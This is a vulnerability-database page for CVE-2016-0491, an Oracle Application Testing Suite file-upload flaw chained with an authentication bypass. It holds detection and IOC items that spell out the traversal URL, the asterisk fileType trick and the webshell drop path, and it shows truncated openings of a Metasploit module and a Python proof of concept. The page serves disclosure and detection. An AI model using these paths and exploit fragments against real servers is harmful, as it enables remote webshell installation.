CVE-2016-0491
published 2016-01-21CVE-2016-0491: Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote…
PriorityP267medium6.4CVSS 2.0
AVNACLAuNCNIPAP
EXPLOIT
EPSS
80.75%
99.6th percentile
Unspecified vulnerability in the Oracle Application Testing Suite component in Oracle Enterprise Manager Grid Control 12.4.0.2 and 12.5.0.2 allows remote attackers to affect integrity and availability via unknown vectors related to Load Testing for Web Apps. NOTE: the previous information is from the January 2016 CPU. Oracle has not commented on third-party claims that the UploadFileAction servlet allows remote authenticated users to upload and execute arbitrary files via an * (asterisk) character in the fileType parameter.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | application_testing_suite | — | — |
| oracle | application_testing_suite | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect authentication bypass via path traversal in POST requests to the UploadFileUpload.do servlet using the pattern /olt/Login.do/../../olt/UploadFileUpload.do ↗
- →Flag multipart POST requests to UploadFileUpload.do where the 'fileType' parameter contains a literal asterisk (*), which bypasses file extension restrictions ↗
- →Alert on HTTP GET requests to /olt/pages/*.jsp following a POST to UploadFileUpload.do, indicating JSP webshell execution ↗
- →Check for version string '12.4.0.2.0' in the body of responses from /admin/Login.do to identify vulnerable OATS instances ↗
- →Monitor for JSP files written under the WebLogic temp deployment path _WL_user/oats_ee/1ryhnd/war/pages, which is the target drop directory for the webshell ↗
- →Successful exploitation results in process running as 'nt authority\system'; monitor for OATS server processes spawning child shells with that privilege level ↗
- ·The exploit chains CVE-2016-0492 (authentication bypass via path traversal) with CVE-2016-0491 (arbitrary file upload); both CVEs must be present for the full attack chain to succeed ↗
- ·Confirmed affected version is 12.4.0.2.0; earlier versions may also be vulnerable but were not tested ↗
- ·The PoC was tested on Win7 SP1 32-bit; the Metasploit module also supports Linux targets with a different directory traversal path ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)
exploitdb·2016-05-25
CVE-2016-0492 Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)
Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Oracle ATS Arbitrary File Upload',
'Description' => %q{
This module exploits an authentication bypass and arbitrary file upload
in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and
unknown earlier versions, to upload and execute a JSP shell.
},
'Author' => [
'Zhou Yu', # Proof of concept
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-0492}, # Auth bypass
%w{CVE 2016-0491}, # File upload
%w{EDB 39691} # PoC
],
'DisclosureDate' => 'Jan 20 2016',
'License' => MSF_LICENSE,
'Platform' => %w{win linux},
'Arch' => ARCH_JAVA,
'Privi
Exploit-DB
Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload
exploitdb·2016-04-13·CVSS 6.4
CVE-2016-0492 [MEDIUM] Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload
Oracle Application Testing Suite (ATS) 12.4.0.2.0 - Authentication Bypass / Arbitrary File Upload
---
# Exploit Title: Oracle Application Testing Suite Authentication Bypass and Arbitrary File Upload Remote Exploit
# Exploit Author: Zhou Yu
# Vendor Homepage: http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/oem/downloads/apptesting-downloads-1983826.html?ssSourceSiteId=otncn
# Version: 12.4.0.2.0
# Tested on: Win7 SP1 32-bit
# CVE : CVE-2016-0492 and CVE-2016-0491
import urllib2
import urllib
ip = '192.168.150.239'
port = 8088
url = "http://" + ip + ":" + str(port)
#bypass authentication
url = url+"/olt/Login.do/../../olt/UploadFileUpload.do"
request = urllib2.Request(url)
webshell_content='''
'''
boundary = "---------------------------7e01e2240a1e"
request
No writeups or analysis indexed.
http://packetstormsecurity.com/files/137175/Oracle-ATS-Arbitrary-File-Upload.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.htmlhttp://www.rapid7.com/db/modules/exploit/multi/http/oracle_ats_file_uploadhttp://www.securityfocus.com/bid/81169http://www.securitytracker.com/id/1034734http://www.zerodayinitiative.com/advisories/ZDI-16-047https://www.exploit-db.com/exploits/39691/https://www.exploit-db.com/exploits/39852/http://packetstormsecurity.com/files/137175/Oracle-ATS-Arbitrary-File-Upload.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.htmlhttp://www.rapid7.com/db/modules/exploit/multi/http/oracle_ats_file_uploadhttp://www.securityfocus.com/bid/81169http://www.securitytracker.com/id/1034734http://www.zerodayinitiative.com/advisories/ZDI-16-047https://www.exploit-db.com/exploits/39691/https://www.exploit-db.com/exploits/39852/
2016-01-21
Published